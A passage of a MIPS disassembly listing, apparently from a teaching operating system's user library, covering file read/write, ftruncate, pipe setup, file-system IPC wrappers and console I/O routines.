402438: 02332821 addu a1,s1,s3
40243c: 0440fff5 bltz v0,402414 <file_close+0x74>
402440: 00408021 move s0,v0
402444: 26311000 addiu s1,s1,4096
402448: 0232102b sltu v0,s1,s2
40244c: 1440fff9 bnez v0,402434 <file_close+0x94>
402450: 00002021 move a0,zero
402454: 00008021 move s0,zero
402458: 02001021 move v0,s0
40245c: 8fbf0020 lw ra,32(sp)
402460: 8fb3001c lw s3,28(sp)
402464: 8fb20018 lw s2,24(sp)
402468: 8fb10014 lw s1,20(sp)
40246c: 8fb00010 lw s0,16(sp)
402470: 03e00008 jr ra
402474: 27bd0028 addiu sp,sp,40
00402478 <file_read>:
402478: 27bdffe0 addiu sp,sp,-32
40247c: afbf001c sw ra,28(sp)
402480: afb20018 sw s2,24(sp)
402484: afb10014 sw s1,20(sp)
402488: afb00010 sw s0,16(sp)
40248c: 00a09021 move s2,a1
402490: 00c08021 move s0,a2
402494: 8c830090 lw v1,144(a0)
402498: 00000000 nop
40249c: 0067102b sltu v0,v1,a3
4024a0: 10400003 beqz v0,4024b0 <file_read+0x38>
4024a4: 00e08821 move s1,a3
4024a8: 1000000d b 4024e0 <file_read+0x68>
4024ac: 00001021 move v0,zero
4024b0: 00e61021 addu v0,a3,a2
4024b4: 0062102b sltu v0,v1,v0
4024b8: 10400002 beqz v0,4024c4 <file_read+0x4c>
4024bc: 00000000 nop
4024c0: 00678023 subu s0,v1,a3
4024c4: 0c1006fa jal 401be8 <fd2data>
4024c8: 00000000 nop
4024cc: 00512021 addu a0,v0,s1
4024d0: 02402821 move a1,s2
4024d4: 0c100322 jal 400c88 <user_bcopy>
4024d8: 02003021 move a2,s0
4024dc: 02001021 move v0,s0
4024e0: 8fbf001c lw ra,28(sp)
4024e4: 8fb20018 lw s2,24(sp)
4024e8: 8fb10014 lw s1,20(sp)
4024ec: 8fb00010 lw s0,16(sp)
4024f0: 03e00008 jr ra
4024f4: 27bd0020 addiu sp,sp,32
004024f8 <read_map>:
4024f8: 27bdffd8 addiu sp,sp,-40
4024fc: afbf0020 sw ra,32(sp)
402500: afb1001c sw s1,28(sp)
402504: afb00018 sw s0,24(sp)
402508: 00a08021 move s0,a1
40250c: 00c08821 move s1,a2
402510: 0c1006e6 jal 401b98 <fd_lookup>
402514: 27a50010 addiu a1,sp,16
402518: 04400029 bltz v0,4025c0 <read_map+0xc8>
40251c: 3c030040 lui v1,0x40
402520: 8fa40010 lw a0,16(sp)
402524: 00000000 nop
402528: 8c820000 lw v0,0(a0)
40252c: 8c637620 lw v1,30240(v1)
402530: 00000000 nop
402534: 14430022 bne v0,v1,4025c0 <read_map+0xc8>
402538: 2402fffd li v0,-3
40253c: 0c1006fa jal 401be8 <fd2data>
402540: 00000000 nop
402544: 00502021 addu a0,v0,s0
402548: 3c02003f lui v0,0x3f
40254c: 3442ffff ori v0,v0,0xffff
402550: 0050102b sltu v0,v0,s0
402554: 1440001a bnez v0,4025c0 <read_map+0xc8>
402558: 2402fff9 li v0,-7
40255c: 00041582 srl v0,a0,0x16
402560: 00021080 sll v0,v0,0x2
402564: 3c030040 lui v1,0x40
402568: 8c63600c lw v1,24588(v1)
40256c: 00000000 nop
402570: 00431021 addu v0,v0,v1
402574: 8c420000 lw v0,0(v0)
402578: 00000000 nop
40257c: 30420200 andi v0,v0,0x200
402580: 1040000f beqz v0,4025c0 <read_map+0xc8>
402584: 2402fff9 li v0,-7
402588: 00041302 srl v0,a0,0xc
40258c: 00021080 sll v0,v0,0x2
402590: 3c030040 lui v1,0x40
402594: 8c636008 lw v1,24584(v1)
402598: 00000000 nop
40259c: 00431021 addu v0,v0,v1
4025a0: 8c420000 lw v0,0(v0)
4025a4: 00000000 nop
4025a8: 30420200 andi v0,v0,0x200
4025ac: 10400003 beqz v0,4025bc <read_map+0xc4>
4025b0: 00001021 move v0,zero
4025b4: 10000002 b 4025c0 <read_map+0xc8>
4025b8: ae240000 sw a0,0(s1)
4025bc: 2402fff9 li v0,-7
4025c0: 8fbf0020 lw ra,32(sp)
4025c4: 8fb1001c lw s1,28(sp)
4025c8: 8fb00018 lw s0,24(sp)
4025cc: 03e00008 jr ra
4025d0: 27bd0028 addiu sp,sp,40
004025d4 <file_write>:
4025d4: 27bdffd8 addiu sp,sp,-40
4025d8: afbf0024 sw ra,36(sp)
4025dc: afb40020 sw s4,32(sp)
4025e0: afb3001c sw s3,28(sp)
4025e4: afb20018 sw s2,24(sp)
4025e8: afb10014 sw s1,20(sp)
4025ec: afb00010 sw s0,16(sp)
4025f0: 00808821 move s1,a0
4025f4: 00a0a021 move s4,a1
4025f8: 00c09021 move s2,a2
4025fc: 00e68021 addu s0,a3,a2
402600: 3c020040 lui v0,0x40
402604: 0050102b sltu v0,v0,s0
402608: 10400003 beqz v0,402618 <file_write+0x44>
40260c: 00e09821 move s3,a3
402610: 10000014 b 402664 <file_write+0x90>
402614: 2402fff9 li v0,-7
402618: 8c820090 lw v0,144(a0)
40261c: 00000000 nop
402620: 0050102b sltu v0,v0,s0
402624: 10400008 beqz v0,402648 <file_write+0x74>
402628: 00000000 nop
40262c: 0c100705 jal 401c14 <fd2num>
402630: 00000000 nop
402634: 00402021 move a0,v0
402638: 0c1009b8 jal 4026e0 <ftruncate>
40263c: 02002821 move a1,s0
402640: 04400008 bltz v0,402664 <file_write+0x90>
402644: 00000000 nop
402648: 0c1006fa jal 401be8 <fd2data>
40264c: 02202021 move a0,s1
402650: 02802021 move a0,s4
402654: 00532821 addu a1,v0,s3
402658: 0c100322 jal 400c88 <user_bcopy>
40265c: 02403021 move a2,s2
402660: 02401021 move v0,s2
402664: 8fbf0024 lw ra,36(sp)
402668: 8fb40020 lw s4,32(sp)
40266c: 8fb3001c lw s3,28(sp)
402670: 8fb20018 lw s2,24(sp)
402674: 8fb10014 lw s1,20(sp)
402678: 8fb00010 lw s0,16(sp)
40267c: 03e00008 jr ra
402680: 27bd0028 addiu sp,sp,40
00402684 <file_stat>:
402684: 27bdffe0 addiu sp,sp,-32
402688: afbf0018 sw ra,24(sp)
40268c: afb10014 sw s1,20(sp)
402690: afb00010 sw s0,16(sp)
402694: 00808021 move s0,a0
402698: 00a08821 move s1,a1
40269c: 00a02021 move a0,a1
4026a0: 0c100647 jal 40191c <strcpy>
4026a4: 26050010 addiu a1,s0,16
4026a8: 8e020090 lw v0,144(s0)
4026ac: 00000000 nop
4026b0: ae220080 sw v0,128(s1)
4026b4: 8e020094 lw v0,148(s0)
4026b8: 00000000 nop
4026bc: 38420001 xori v0,v0,0x1
4026c0: 2c420001 sltiu v0,v0,1
4026c4: ae220084 sw v0,132(s1)
4026c8: 00001021 move v0,zero
4026cc: 8fbf0018 lw ra,24(sp)
4026d0: 8fb10014 lw s1,20(sp)
4026d4: 8fb00010 lw s0,16(sp)
4026d8: 03e00008 jr ra
4026dc: 27bd0020 addiu sp,sp,32
004026e0 <ftruncate>:
4026e0: 27bdffb8 addiu sp,sp,-72
4026e4: afbf0044 sw ra,68(sp)
4026e8: afbe0040 sw s8,64(sp)
4026ec: afb7003c sw s7,60(sp)
4026f0: afb60038 sw s6,56(sp)
4026f4: afb50034 sw s5,52(sp)
4026f8: afb40030 sw s4,48(sp)
4026fc: afb3002c sw s3,44(sp)
402700: afb20028 sw s2,40(sp)
402704: afb10024 sw s1,36(sp)
402708: afb00020 sw s0,32(sp)
40270c: 3c020040 lui v0,0x40
402710: 0045102b sltu v0,v0,a1
402714: 10400003 beqz v0,402724 <ftruncate+0x44>
402718: 00a08821 move s1,a1
40271c: 10000049 b 402844 <ftruncate+0x164>
402720: 2410fff9 li s0,-7
402724: 0c1006e6 jal 401b98 <fd_lookup>
402728: 27a50018 addiu a1,sp,24
40272c: 04400045 bltz v0,402844 <ftruncate+0x164>
402730: 00408021 move s0,v0
402734: 8fa50018 lw a1,24(sp)
402738: 00000000 nop
40273c: 8ca20000 lw v0,0(a1)
402740: 3c030040 lui v1,0x40
402744: 8c637620 lw v1,30240(v1)
402748: 00000000 nop
40274c: 10430008 beq v0,v1,402770 <ftruncate+0x90>
402750: 2410fffd li s0,-3
402754: 1000003c b 402848 <ftruncate+0x168>
402758: 02001021 move v0,s0
40275c: 02602021 move a0,s3
402760: 0c100b2a jal 402ca8 <fsipc_set_size>
402764: 02e02821 move a1,s7
402768: 10000037 b 402848 <ftruncate+0x168>
40276c: 02001021 move v0,s0
402770: 8cb3000c lw s3,12(a1)
402774: 8cb70090 lw s7,144(a1)
402778: 02602021 move a0,s3
40277c: 0c100b2a jal 402ca8 <fsipc_set_size>
402780: 02202821 move a1,s1
402784: 0440002f bltz v0,402844 <ftruncate+0x164>
402788: 00408021 move s0,v0
40278c: 8fa40018 lw a0,24(sp)
402790: 0c1006fa jal 401be8 <fd2data>
402794: 26f60fff addiu s6,s7,4095
402798: 0040f021 move s8,v0
40279c: 2402f000 li v0,-4096
4027a0: 02c29024 and s2,s6,v0
4027a4: 26350fff addiu s5,s1,4095
4027a8: 02a2a024 and s4,s5,v0
4027ac: 0254102b sltu v0,s2,s4
4027b0: 1040000d beqz v0,4027e8 <ftruncate+0x108>
4027b4: 2402f000 li v0,-4096
4027b8: 025e8821 addu s1,s2,s8
4027bc: 02602021 move a0,s3
4027c0: 02402821 move a1,s2
4027c4: 0c100b0c jal 402c30 <fsipc_map>
4027c8: 02203021 move a2,s1
4027cc: 0440ffe3 bltz v0,40275c <ftruncate+0x7c>
4027d0: 00408021 move s0,v0
4027d4: 26521000 addiu s2,s2,4096
4027d8: 0254102b sltu v0,s2,s4
4027dc: 1440fff7 bnez v0,4027bc <ftruncate+0xdc>
4027e0: 26311000 addiu s1,s1,4096
4027e4: 2402f000 li v0,-4096
4027e8: 02a28024 and s0,s5,v0
4027ec: 02c29024 and s2,s6,v0
4027f0: 0212102b sltu v0,s0,s2
4027f4: 10400012 beqz v0,402840 <ftruncate+0x160>
4027f8: 03d08821 addu s1,s8,s0
4027fc: 00002021 move a0,zero
402800: 0c100591 jal 401644 <syscall_mem_unmap>
402804: 02202821 move a1,s1
402808: 0441000a bgez v0,402834 <ftruncate+0x154>
40280c: 26101000 addiu s0,s0,4096
402810: 2610f000 addiu s0,s0,-4096
402814: afa20010 sw v0,16(sp)
402818: 3c040040 lui a0,0x40
40281c: 24847564 addiu a0,a0,30052
402820: 24050113 li a1,275
402824: 3c060040 lui a2,0x40
402828: 24c6756c addiu a2,a2,30060
40282c: 0c100096 jal 400258 <_user_panic>
402830: 02203821 move a3,s1
402834: 0212102b sltu v0,s0,s2
402838: 1440fff0 bnez v0,4027fc <ftruncate+0x11c>
40283c: 26311000 addiu s1,s1,4096
402840: 00008021 move s0,zero
402844: 02001021 move v0,s0
402848: 8fbf0044 lw ra,68(sp)
40284c: 8fbe0040 lw s8,64(sp)
402850: 8fb7003c lw s7,60(sp)
402854: 8fb60038 lw s6,56(sp)
402858: 8fb50034 lw s5,52(sp)
40285c: 8fb40030 lw s4,48(sp)
402860: 8fb3002c lw s3,44(sp)
402864: 8fb20028 lw s2,40(sp)
402868: 8fb10024 lw s1,36(sp)
40286c: 8fb00020 lw s0,32(sp)
402870: 03e00008 jr ra
402874: 27bd0048 addiu sp,sp,72
00402878 <remove>:
402878: 27bdffe8 addiu sp,sp,-24
40287c: afbf0010 sw ra,16(sp)
402880: 0c100b55 jal 402d54 <fsipc_remove>
402884: 00000000 nop
402888: 8fbf0010 lw ra,16(sp)
40288c: 00000000 nop
402890: 03e00008 jr ra
402894: 27bd0018 addiu sp,sp,24
00402898 <sync>:
402898: 27bdffe8 addiu sp,sp,-24
40289c: afbf0010 sw ra,16(sp)
4028a0: 0c100b6d jal 402db4 <fsipc_sync>
4028a4: 00000000 nop
4028a8: 8fbf0010 lw ra,16(sp)
4028ac: 00000000 nop
4028b0: 03e00008 jr ra
4028b4: 27bd0018 addiu sp,sp,24
...
004028c0 <pipe>:
4028c0: 27bdffd0 addiu sp,sp,-48
4028c4: afbf002c sw ra,44(sp)
4028c8: afb20028 sw s2,40(sp)
4028cc: afb10024 sw s1,36(sp)
4028d0: afb00020 sw s0,32(sp)
4028d4: 00809021 move s2,a0
4028d8: 0c1006bc jal 401af0 <fd_alloc>
4028dc: 27a40018 addiu a0,sp,24
4028e0: 04400056 bltz v0,402a3c <pipe+0x17c>
4028e4: 00408021 move s0,v0
4028e8: 00002021 move a0,zero
4028ec: 8fa50018 lw a1,24(sp)
4028f0: 0c100570 jal 4015c0 <syscall_mem_alloc>
4028f4: 24060604 li a2,1540
4028f8: 04400050 bltz v0,402a3c <pipe+0x17c>
4028fc: 00408021 move s0,v0
402900: 0c1006bc jal 401af0 <fd_alloc>
402904: 27a4001c addiu a0,sp,28
402908: 04400049 bltz v0,402a30 <pipe+0x170>
40290c: 00408021 move s0,v0
402910: 00002021 move a0,zero
402914: 8fa5001c lw a1,28(sp)
402918: 0c100570 jal 4015c0 <syscall_mem_alloc>
40291c: 24060604 li a2,1540
402920: 04400043 bltz v0,402a30 <pipe+0x170>
402924: 00408021 move s0,v0
402928: 8fa40018 lw a0,24(sp)
40292c: 0c1006fa jal 401be8 <fd2data>
402930: 00000000 nop
402934: 00408821 move s1,v0
402938: 00002021 move a0,zero
40293c: 00402821 move a1,v0
402940: 0c100570 jal 4015c0 <syscall_mem_alloc>
402944: 24060604 li a2,1540
402948: 04400036 bltz v0,402a24 <pipe+0x164>
40294c: 00408021 move s0,v0
402950: 8fa4001c lw a0,28(sp)
402954: 0c1006fa jal 401be8 <fd2data>
402958: 00000000 nop
40295c: 24030604 li v1,1540
402960: afa30010 sw v1,16(sp)
402964: 00002021 move a0,zero
402968: 02202821 move a1,s1
40296c: 00003021 move a2,zero
402970: 0c10057f jal 4015fc <syscall_mem_map>
402974: 00403821 move a3,v0
402978: 04400027 bltz v0,402a18 <pipe+0x158>
40297c: 00408021 move s0,v0
402980: 3c040040 lui a0,0x40
402984: 8c83763c lw v1,30268(a0)
402988: 8fa20018 lw v0,24(sp)
40298c: 00000000 nop
402990: ac430000 sw v1,0(v0)
402994: 8fa20018 lw v0,24(sp)
402998: 00000000 nop
40299c: ac400008 sw zero,8(v0)
4029a0: 8c83763c lw v1,30268(a0)
4029a4: 8fa2001c lw v0,28(sp)
4029a8: 00000000 nop
4029ac: ac430000 sw v1,0(v0)
4029b0: 24030001 li v1,1
4029b4: 8fa2001c lw v0,28(sp)
4029b8: 00000000 nop
4029bc: ac430008 sw v1,8(v0)
4029c0: 3c020041 lui v0,0x41
4029c4: 8c458004 lw a1,-32764(v0)
4029c8: 00111302 srl v0,s1,0xc
4029cc: 00021080 sll v0,v0,0x2
4029d0: 3c030040 lui v1,0x40
4029d4: 8c636008 lw v1,24584(v1)
4029d8: 00000000 nop
4029dc: 00431021 addu v0,v0,v1
4029e0: 8c460000 lw a2,0(v0)
4029e4: 3c040040 lui a0,0x40
4029e8: 8ca500a4 lw a1,164(a1)
4029ec: 0c100086 jal 400218 <writef>
4029f0: 2484759c addiu a0,a0,30108
4029f4: 8fa40018 lw a0,24(sp)
4029f8: 0c100705 jal 401c14 <fd2num>
4029fc: 00008021 move s0,zero
402a00: ae420000 sw v0,0(s2)
402a04: 8fa4001c lw a0,28(sp)
402a08: 0c100705 jal 401c14 <fd2num>
402a0c: 00000000 nop
402a10: 1000000a b 402a3c <pipe+0x17c>
402a14: ae420004 sw v0,4(s2)
402a18: 00002021 move a0,zero
402a1c: 0c100591 jal 401644 <syscall_mem_unmap>
402a20: 02202821 move a1,s1
402a24: 8fa5001c lw a1,28(sp)
402a28: 0c100591 jal 401644 <syscall_mem_unmap>
402a2c: 00002021 move a0,zero
402a30: 8fa50018 lw a1,24(sp)
402a34: 0c100591 jal 401644 <syscall_mem_unmap>
402a38: 00002021 move a0,zero
402a3c: 02001021 move v0,s0
402a40: 8fbf002c lw ra,44(sp)
402a44: 8fb20028 lw s2,40(sp)
402a48: 8fb10024 lw s1,36(sp)
402a4c: 8fb00020 lw s0,32(sp)
402a50: 03e00008 jr ra
402a54: 27bd0030 addiu sp,sp,48
00402a58 <_pipeisclosed>:
402a58: 03e00008 jr ra
402a5c: 00000000 nop
00402a60 <pipeisclosed>:
402a60: 27bdffe0 addiu sp,sp,-32
402a64: afbf0018 sw ra,24(sp)
402a68: 0c1006e6 jal 401b98 <fd_lookup>
402a6c: 27a50010 addiu a1,sp,16
402a70: 04400007 bltz v0,402a90 <pipeisclosed+0x30>
402a74: 00000000 nop
402a78: 8fa40010 lw a0,16(sp)
402a7c: 0c1006fa jal 401be8 <fd2data>
402a80: 00000000 nop
402a84: 8fa40010 lw a0,16(sp)
402a88: 0c100a96 jal 402a58 <_pipeisclosed>
402a8c: 00402821 move a1,v0
402a90: 8fbf0018 lw ra,24(sp)
402a94: 00000000 nop
402a98: 03e00008 jr ra
402a9c: 27bd0020 addiu sp,sp,32
00402aa0 <piperead>:
402aa0: 03e00008 jr ra
402aa4: 00000000 nop
00402aa8 <pipewrite>:
402aa8: 03e00008 jr ra
402aac: 00c01021 move v0,a2
00402ab0 <pipestat>:
402ab0: 27bdffe0 addiu sp,sp,-32
402ab4: afbf0018 sw ra,24(sp)
402ab8: afb10014 sw s1,20(sp)
402abc: afb00010 sw s0,16(sp)
402ac0: 0c1006fa jal 401be8 <fd2data>
402ac4: 00a08021 move s0,a1
402ac8: 00408821 move s1,v0
402acc: 02002021 move a0,s0
402ad0: 3c050040 lui a1,0x40
402ad4: 0c100647 jal 40191c <strcpy>
402ad8: 24a575b0 addiu a1,a1,30128
402adc: 8e220004 lw v0,4(s1)
402ae0: 8e230000 lw v1,0(s1)
402ae4: 00000000 nop
402ae8: 00431023 subu v0,v0,v1
402aec: ae020080 sw v0,128(s0)
402af0: ae000084 sw zero,132(s0)
402af4: 3c020040 lui v0,0x40
402af8: 2442763c addiu v0,v0,30268
402afc: ae020088 sw v0,136(s0)
402b00: 00001021 move v0,zero
402b04: 8fbf0018 lw ra,24(sp)
402b08: 8fb10014 lw s1,20(sp)
402b0c: 8fb00010 lw s0,16(sp)
402b10: 03e00008 jr ra
402b14: 27bd0020 addiu sp,sp,32
00402b18 <pipeclose>:
402b18: 27bdffe8 addiu sp,sp,-24
402b1c: afbf0010 sw ra,16(sp)
402b20: 0c1006fa jal 401be8 <fd2data>
402b24: 00000000 nop
402b28: 00002021 move a0,zero
402b2c: 0c100591 jal 401644 <syscall_mem_unmap>
402b30: 00402821 move a1,v0
402b34: 00001021 move v0,zero
402b38: 8fbf0010 lw ra,16(sp)
402b3c: 00000000 nop
402b40: 03e00008 jr ra
402b44: 27bd0018 addiu sp,sp,24
...
00402b50 <fsipc>:
402b50: 27bdffd8 addiu sp,sp,-40
402b54: afbf0020 sw ra,32(sp)
402b58: afb1001c sw s1,28(sp)
402b5c: afb00018 sw s0,24(sp)
402b60: 00801821 move v1,a0
402b64: 00a04021 move t0,a1
402b68: 00c08021 move s0,a2
402b6c: 00e08821 move s1,a3
402b70: 3c020040 lui v0,0x40
402b74: 8c426000 lw v0,24576(v0)
402b78: 00000000 nop
402b7c: 8c44018c lw a0,396(v0)
402b80: 00602821 move a1,v1
402b84: 01003021 move a2,t0
402b88: 0c1005f4 jal 4017d0 <ipc_send>
402b8c: 24070600 li a3,1536
402b90: 27a40010 addiu a0,sp,16
402b94: 02002821 move a1,s0
402b98: 0c10061a jal 401868 <ipc_recv>
402b9c: 02203021 move a2,s1
402ba0: 8fbf0020 lw ra,32(sp)
402ba4: 8fb1001c lw s1,28(sp)
402ba8: 8fb00018 lw s0,24(sp)
402bac: 03e00008 jr ra
402bb0: 27bd0028 addiu sp,sp,40
00402bb4 <fsipc_open>:
402bb4: 27bdffd0 addiu sp,sp,-48
402bb8: afbf0028 sw ra,40(sp)
402bbc: afb30024 sw s3,36(sp)
402bc0: afb20020 sw s2,32(sp)
402bc4: afb1001c sw s1,28(sp)
402bc8: afb00018 sw s0,24(sp)
402bcc: 00808821 move s1,a0
402bd0: 00a09021 move s2,a1
402bd4: 00c09821 move s3,a2
402bd8: 3c020040 lui v0,0x40
402bdc: 0c10063c jal 4018f0 <strlen>
402be0: 24504000 addiu s0,v0,16384
402be4: 28420400 slti v0,v0,1024
402be8: 1040000a beqz v0,402c14 <fsipc_open+0x60>
402bec: 2402fff6 li v0,-10
402bf0: 02002021 move a0,s0
402bf4: 0c100647 jal 40191c <strcpy>
402bf8: 02202821 move a1,s1
402bfc: ae120400 sw s2,1024(s0)
402c00: 24040001 li a0,1
402c04: 02002821 move a1,s0
402c08: 02603021 move a2,s3
402c0c: 0c100ad4 jal 402b50 <fsipc>
402c10: 27a70010 addiu a3,sp,16
402c14: 8fbf0028 lw ra,40(sp)
402c18: 8fb30024 lw s3,36(sp)
402c1c: 8fb20020 lw s2,32(sp)
402c20: 8fb1001c lw s1,28(sp)
402c24: 8fb00018 lw s0,24(sp)
402c28: 03e00008 jr ra
402c2c: 27bd0030 addiu sp,sp,48
00402c30 <fsipc_map>:
402c30: 27bdffd8 addiu sp,sp,-40
402c34: afbf0024 sw ra,36(sp)
402c38: afb00020 sw s0,32(sp)
402c3c: 00c08021 move s0,a2
402c40: 3c020040 lui v0,0x40
402c44: 24434000 addiu v1,v0,16384
402c48: ac444000 sw a0,16384(v0)
402c4c: ac650004 sw a1,4(v1)
402c50: 24040002 li a0,2
402c54: 00602821 move a1,v1
402c58: 0c100ad4 jal 402b50 <fsipc>
402c5c: 27a70018 addiu a3,sp,24
402c60: 0440000d bltz v0,402c98 <fsipc_map+0x68>
402c64: 24030200 li v1,512
402c68: 8fa70018 lw a3,24(sp)
402c6c: 2402fbfb li v0,-1029
402c70: 00e21024 and v0,a3,v0
402c74: 10430008 beq v0,v1,402c98 <fsipc_map+0x68>
402c78: 00001021 move v0,zero
402c7c: afb00010 sw s0,16(sp)
402c80: 3c040040 lui a0,0x40
402c84: 248475b8 addiu a0,a0,30136
402c88: 2405004a li a1,74
402c8c: 3c060040 lui a2,0x40
402c90: 0c100096 jal 400258 <_user_panic>
402c94: 24c675c0 addiu a2,a2,30144
402c98: 8fbf0024 lw ra,36(sp)
402c9c: 8fb00020 lw s0,32(sp)
402ca0: 03e00008 jr ra
402ca4: 27bd0028 addiu sp,sp,40
00402ca8 <fsipc_set_size>:
402ca8: 27bdffe8 addiu sp,sp,-24
402cac: afbf0010 sw ra,16(sp)
402cb0: 3c020040 lui v0,0x40
402cb4: 24434000 addiu v1,v0,16384
402cb8: ac444000 sw a0,16384(v0)
402cbc: ac650004 sw a1,4(v1)
402cc0: 24040003 li a0,3
402cc4: 00602821 move a1,v1
402cc8: 00003021 move a2,zero
402ccc: 0c100ad4 jal 402b50 <fsipc>
402cd0: 00003821 move a3,zero
402cd4: 8fbf0010 lw ra,16(sp)
402cd8: 00000000 nop
402cdc: 03e00008 jr ra
402ce0: 27bd0018 addiu sp,sp,24
00402ce4 <fsipc_close>:
402ce4: 27bdffe8 addiu sp,sp,-24
402ce8: afbf0010 sw ra,16(sp)
402cec: 3c050040 lui a1,0x40
402cf0: aca44000 sw a0,16384(a1)
402cf4: 24040004 li a0,4
402cf8: 24a54000 addiu a1,a1,16384
402cfc: 00003021 move a2,zero
402d00: 0c100ad4 jal 402b50 <fsipc>
402d04: 00003821 move a3,zero
402d08: 8fbf0010 lw ra,16(sp)
402d0c: 00000000 nop
402d10: 03e00008 jr ra
402d14: 27bd0018 addiu sp,sp,24
00402d18 <fsipc_dirty>:
402d18: 27bdffe8 addiu sp,sp,-24
402d1c: afbf0010 sw ra,16(sp)
402d20: 3c020040 lui v0,0x40
402d24: 24434000 addiu v1,v0,16384
402d28: ac444000 sw a0,16384(v0)
402d2c: ac650004 sw a1,4(v1)
402d30: 24040005 li a0,5
402d34: 00602821 move a1,v1
402d38: 00003021 move a2,zero
402d3c: 0c100ad4 jal 402b50 <fsipc>
402d40: 00003821 move a3,zero
402d44: 8fbf0010 lw ra,16(sp)
402d48: 00000000 nop
402d4c: 03e00008 jr ra
402d50: 27bd0018 addiu sp,sp,24
00402d54 <fsipc_remove>:
402d54: 27bdffe0 addiu sp,sp,-32
402d58: afbf0018 sw ra,24(sp)
402d5c: afb10014 sw s1,20(sp)
402d60: afb00010 sw s0,16(sp)
402d64: 00808821 move s1,a0
402d68: 3c020040 lui v0,0x40
402d6c: 0c10063c jal 4018f0 <strlen>
402d70: 24504000 addiu s0,v0,16384
402d74: 28420400 slti v0,v0,1024
402d78: 10400009 beqz v0,402da0 <fsipc_remove+0x4c>
402d7c: 2402fff6 li v0,-10
402d80: 02002021 move a0,s0
402d84: 0c100647 jal 40191c <strcpy>
402d88: 02202821 move a1,s1
402d8c: 24040006 li a0,6
402d90: 02002821 move a1,s0
402d94: 00003021 move a2,zero
402d98: 0c100ad4 jal 402b50 <fsipc>
402d9c: 00003821 move a3,zero
402da0: 8fbf0018 lw ra,24(sp)
402da4: 8fb10014 lw s1,20(sp)
402da8: 8fb00010 lw s0,16(sp)
402dac: 03e00008 jr ra
402db0: 27bd0020 addiu sp,sp,32
00402db4 <fsipc_sync>:
402db4: 27bdffe8 addiu sp,sp,-24
402db8: afbf0010 sw ra,16(sp)
402dbc: 24040007 li a0,7
402dc0: 3c050040 lui a1,0x40
402dc4: 24a54000 addiu a1,a1,16384
402dc8: 00003021 move a2,zero
402dcc: 0c100ad4 jal 402b50 <fsipc>
402dd0: 00003821 move a3,zero
402dd4: 8fbf0010 lw ra,16(sp)
402dd8: 00000000 nop
402ddc: 03e00008 jr ra
402de0: 27bd0018 addiu sp,sp,24
...
00402df0 <iscons>:
402df0: 27bdffe0 addiu sp,sp,-32
402df4: afbf0018 sw ra,24(sp)
402df8: 0c1006e6 jal 401b98 <fd_lookup>
402dfc: 27a50010 addiu a1,sp,16
402e00: 04400008 bltz v0,402e24 <iscons+0x34>
402e04: 3c030040 lui v1,0x40
402e08: 8fa20010 lw v0,16(sp)
402e0c: 00000000 nop
402e10: 8c420000 lw v0,0(v0)
402e14: 8c637658 lw v1,30296(v1)
402e18: 00000000 nop
402e1c: 00431026 xor v0,v0,v1
402e20: 2c420001 sltiu v0,v0,1
402e24: 8fbf0018 lw ra,24(sp)
402e28: 00000000 nop
402e2c: 03e00008 jr ra
402e30: 27bd0020 addiu sp,sp,32
00402e34 <opencons>:
402e34: 27bdffe0 addiu sp,sp,-32
402e38: afbf0018 sw ra,24(sp)
402e3c: 0c1006bc jal 401af0 <fd_alloc>
402e40: 27a40010 addiu a0,sp,16
402e44: 04400012 bltz v0,402e90 <opencons+0x5c>
402e48: 00002021 move a0,zero
402e4c: 8fa50010 lw a1,16(sp)
402e50: 0c100570 jal 4015c0 <syscall_mem_alloc>
402e54: 24060604 li a2,1540
402e58: 0440000d bltz v0,402e90 <opencons+0x5c>
402e5c: 00000000 nop
402e60: 3c020040 lui v0,0x40
402e64: 8c437658 lw v1,30296(v0)
402e68: 8fa20010 lw v0,16(sp)
402e6c: 00000000 nop
402e70: ac430000 sw v1,0(v0)
402e74: 24030002 li v1,2
402e78: 8fa20010 lw v0,16(sp)
402e7c: 00000000 nop
402e80: ac430008 sw v1,8(v0)
402e84: 8fa40010 lw a0,16(sp)
402e88: 0c100705 jal 401c14 <fd2num>
402e8c: 00000000 nop
402e90: 8fbf0018 lw ra,24(sp)
402e94: 00000000 nop
402e98: 03e00008 jr ra
402e9c: 27bd0020 addiu sp,sp,32
00402ea0 <cons_read>:
402ea0: 27bdffe0 addiu sp,sp,-32
402ea4: afbf0018 sw ra,24(sp)
402ea8: afb10014 sw s1,20(sp)
402eac: afb00010 sw s0,16(sp)
402eb0: 14c00005 bnez a2,402ec8 <cons_read+0x28>
402eb4: 00a08821 move s1,a1
402eb8: 1000001d b 402f30 <cons_read+0x90>
402ebc: 00008021 move s0,zero
402ec0: 0c100547 jal 40151c <syscall_yield>
402ec4: 00000000 nop
402ec8: 0c1005e5 jal 401794 <syscall_cgetc>
402ecc: 00000000 nop
402ed0: 1040fffb beqz v0,402ec0 <cons_read+0x20>
402ed4: 00408021 move s0,v0
402ed8: 2402000d li v0,13
402edc: 12020009 beq s0,v0,402f04 <cons_read+0x64>
402ee0: 3c040040 lui a0,0x40
402ee4: 3c040040 lui a0,0x40
402ee8: 24847600 addiu a0,a0,30208
402eec: 0c100086 jal 400218 <writef>
402ef0: 02002821 move a1,s0
402ef4: 06010007 bgez s0,402f14 <cons_read+0x74>
402ef8: 02001021 move v0,s0
402efc: 1000000d b 402f34 <cons_read+0x94>
402f00: 00000000 nop
402f04: 0c100086 jal 400218 <writef>
402f08: 2484752c addiu a0,a0,29996
402f0c: 10000005 b 402f24 <cons_read+0x84>
402f10: a2300000 sb s0,0(s1)
402f14: 24020004 li v0,4
402f18: 12020004 beq s0,v0,402f2c <cons_read+0x8c>
402f1c: 00000000 nop
402f20: a2300000 sb s0,0(s1)
402f24: 10000002 b 402f30 <cons_read+0x90>
402f28: 24100001 li s0,1
402f2c: 00008021 move s0,zero
402f30: 02001021 move v0,s0
402f34: 8fbf0018 lw ra,24(sp)
402f38: 8fb10014 lw s1,20(sp)
402f3c: 8fb00010 lw s0,16(sp)
402f40: 03e00008 jr ra
402f44: 27bd0020 addiu sp,sp,32
00402f48 <cons_write>:
402f48: 27bdff50 addiu sp,sp,-176
402f4c: afbf00a8 sw ra,168(sp)
402f50: afb500a4 sw s5,164(sp)
402f54: afb400a0 sw s4,160(sp)
402f58: afb3009c sw s3,156(sp)
402f5c: afb20098 sw s2,152(sp)
402f60: afb10094 sw s1,148(sp)
402f64: afb00090 sw s0,144(sp)
402f68: 00a0a821 move s5,a1
402f6c: 14c00003 bnez a2,402f7c <cons_write+0x34>
402f70: 00c08821 move s1,a2
402f74: 10000016 b 402fd0 <cons_write+0x88>
402f78: 00009021 move s2,zero
402f7c: 00001821 move v1,zero
402f80: 00009021 move s2,zero
